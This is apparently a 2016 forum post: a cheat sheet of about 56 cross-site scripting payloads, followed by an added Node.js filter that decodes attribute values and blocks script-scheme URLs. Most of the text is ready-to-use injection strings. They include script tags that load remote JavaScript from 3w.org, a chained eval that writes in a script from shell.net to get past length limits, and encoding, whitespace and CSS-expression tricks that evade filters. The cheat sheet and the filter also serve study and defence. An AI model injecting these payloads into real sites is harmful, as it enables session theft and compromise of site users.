XSS Attack Summary

Posted 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative popups (event handlers on unknown or malformed tags; the HTML parser still creates an element and attaches the handler)
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using the JavaScript directive (javascript: URLs in IMG SRC, DYNSRC, LOWSRC, BGSOUND, BACKGROUND and CSS url() only execute in old browsers such as IE 6/7; a modern browser treats them as a failed image load)
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entities (the semicolon is required here)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag (the stray quotes break the attribute parse and the SCRIPT tag is emitted as markup)
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode (decimal entity) encoding (calculator)
<IMG SRC=jav..(omitted)..S')>

(9) Long 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..(omitted)..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting the word "javascript" (a literal horizontal tab between "jav" and "ascript")
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the word "javascript"
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, one character per line; an extreme XSS example
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

(16) Working around a length limit on a single field (all the pieces must land on the same page, in order)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective here, because there is nowhere they can be exploited.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS (any non-alphanumeric character terminates the tag name, so "/" works in place of a space)
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS (no closing ">"; the parser closes the tag at the next ">" it finds)
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons (the string comes from a regex literal's .source)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes (for input reflected inside a JS string where the server escapes quotes with a backslash)
\";alert('XSS');//

(30) End TITLE tag (content inside TITLE is not parsed as markup until the tag is closed)
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript (IE only)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character prepended; code points 1-32, 34, 39, 160, 8192-8200, 13, 12288 and 65279 are all skipped before the scheme is read
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression (CSS expression() is IE-only and was removed in IE8 standards mode)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with an expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (any tag name works: an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with an expression split by comments
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE (rewrites every relative URL on the page to start with the javascript: scheme)
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
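Most of the IMG-style vectors above, (3)-(5), (7)-(14), (17) and (19), beat a filter that searches the raw attribute text for the literal string "javascript:". They work because the browser decodes the attribute before it reads the scheme: character references are resolved with or without a trailing semicolon, the URL parser strips leading control characters and removes every tab, newline and carriage return, and the scheme is matched case-insensitively. The following is an added example, not code from the original post, that reproduces that decoding in Node.js (no dependencies) and runs it over attribute values taken from the vectors above, plus two benign URLs, as constructed inputs. Function names are mine. Note what it shows for (17): the HTML tokenizer turns a NUL byte into U+FFFD, so "java\0script" never becomes a javascript: URL in a current browser, which matches the remark under (18). The same scheme check is the one to apply to every URL-valued attribute in (31)-(36), (42) and (43); in a real sanitiser take the value from the parsed DOM rather than re-implementing the tokenizer.

```javascript
// Added example (not from the original post): normalise a URL-valued HTML
// attribute the way a browser does before deciding its scheme, then check it.

// Named references that occur in the vectors above (a full table has ~2200 entries).
const NAMED_REFS = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'", Tab: '\t', NewLine: '\n' };

// Step 1: what the HTML tokenizer does to an attribute value.
//  - a NUL byte becomes U+FFFD (so vector 17 no longer spells "javascript")
//  - numeric references decode with or without the trailing ";" (vectors 9, 10);
//    hex digits are consumed greedily, as a browser does
function tokenizeAttributeValue(raw) {
  return raw
    .replace(/\u0000/g, '\uFFFD')
    .replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[A-Za-z]+);?/g, (match, body) => {
      if (body[0] === '#') {
        const hex = body[1] === 'x' || body[1] === 'X';
        const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
        if (cp === 0) return '\uFFFD';
        return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
      }
      return Object.prototype.hasOwnProperty.call(NAMED_REFS, body) ? NAMED_REFS[body] : match;
    });
}

// Step 2: what the URL parser does to the decoded string (WHATWG URL):
// strip leading/trailing C0 controls and spaces, then drop every ASCII
// tab, LF and CR anywhere in the input (vectors 11-14 and 19).
function stripUrlWhitespace(s) {
  return s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '').replace(/[\t\n\r]/g, '');
}

// The lower-cased scheme the browser would use, or null for a relative URL.
function urlScheme(rawAttributeValue) {
  const url = stripUrlWhitespace(tokenizeAttributeValue(rawAttributeValue));
  const m = /^([A-Za-z][A-Za-z0-9+.\-]*):/.exec(url);
  return m ? m[1].toLowerCase() : null;
}

const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript', 'data']);

function isScriptUrl(rawAttributeValue) {
  return SCRIPT_SCHEMES.has(urlScheme(rawAttributeValue));
}

// Constructed inputs: attribute values (without surrounding quotes) from the
// numbered vectors above, plus two benign URLs.
const SAMPLES = [
  ['(3) no quotes/semicolon', "javascript:alert('XSS')"],
  ['(4) mixed case', "JaVaScRiPt:alert('XSS')"],
  ['(5) &quot; entities', 'javascript:alert(&quot;XSS&quot;)'],
  ['(7) fromCharCode', 'javascript:alert(String.fromCharCode(88,83,83))'],
  ['(8) decimal entities', "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')"],
  ['(10) hex, no semicolons', '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29'],
  ['(11) literal tab', "jav\tascript:alert('XSS');"],
  ['(12) encoded tab', "jav&#x09;ascript:alert('XSS');"],
  ['(13) encoded newline', "jav&#x0A;ascript:alert('XSS');"],
  ['(14) encoded CR', "jav&#x0D;ascript:alert('XSS');"],
  ['(17) NUL byte', 'java\u0000script:alert("XSS")'],
  ['(19) leading space + &#14;', " &#14;  javascript:alert('XSS');"],
  ['benign absolute', 'http://3w.org/XSS/xss.js'],
  ['benign relative', '/images/logo.png'],
];

// One row per sample: the decoded scheme and whether a filter should block it.
function report(samples = SAMPLES) {
  return samples.map(([label, value]) => ({ label, scheme: urlScheme(value), blocked: isScriptUrl(value) }));
}

for (const r of report()) {
  console.log(`${r.blocked ? 'BLOCK' : 'allow'}  ${r.label}  scheme=${r.scheme}`);
}
```

Run it with node; every vector except (17) and the two benign URLs comes back BLOCK with scheme=javascript. Matching on the decoded scheme rather than on the raw text is what makes the twelve spellings collapse to one case, and it is also why a sanitiser that only strips the literal "javascript:" from the raw input is not a fix.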